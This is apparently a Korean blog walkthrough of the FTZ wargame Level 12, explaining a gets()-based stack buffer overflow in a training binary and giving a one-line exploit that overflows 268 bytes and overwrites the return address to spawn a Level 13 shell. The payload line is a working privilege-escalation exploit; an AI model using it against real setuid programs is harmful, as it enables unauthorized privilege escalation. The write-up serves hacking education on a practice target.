본문 바로가기
Security/Pwnable

FTZ Level 12

by J0DEV 2021. 8. 9.
반응형

Level 12에 접속하여 

파일들을보면

Level 11과 똑같다

hint파일을 보면 11과 같이 256바이트를 할당한 변수를 생성하고 있다.

다른점은 strcpy함수가 아닌 gets함수를 사용한다는 것이다.

gdb로 뜯어보면

구조는 Level11과 같다

RET		4byte
SFP		4byte
DUMMY		8byte
STACK		256byte

 

 

그래서 Level11과 똑같이 풀었는데

 

안된다 ㅋㅋㅋㅋㅋㅋ

 

가만 생각해보니 gets 함수라서 그렇다.

"|"와 cat을 사용하여 값을 넘겨주면 해결된다.

(eggshell과 getenv 사용)

(python -c 'print "A"*268+"\xbc\xf2\xff\xbf"';cat)|./attackme

 

그럼 Level 13의 권한을 획득한다.

 

 

반응형

'Security > Pwnable' 카테고리의 다른 글

FTZ Level 14  (0) 2021.08.09
FTZ Level 13  (0) 2021.08.09
FTZ Level 11  (0) 2021.08.09
Buffer Overflow 원리 - 공격-1 고전적인 방법  (0) 2021.08.08
Buffer Overflow 원리 - 쉘코드  (0) 2021.08.06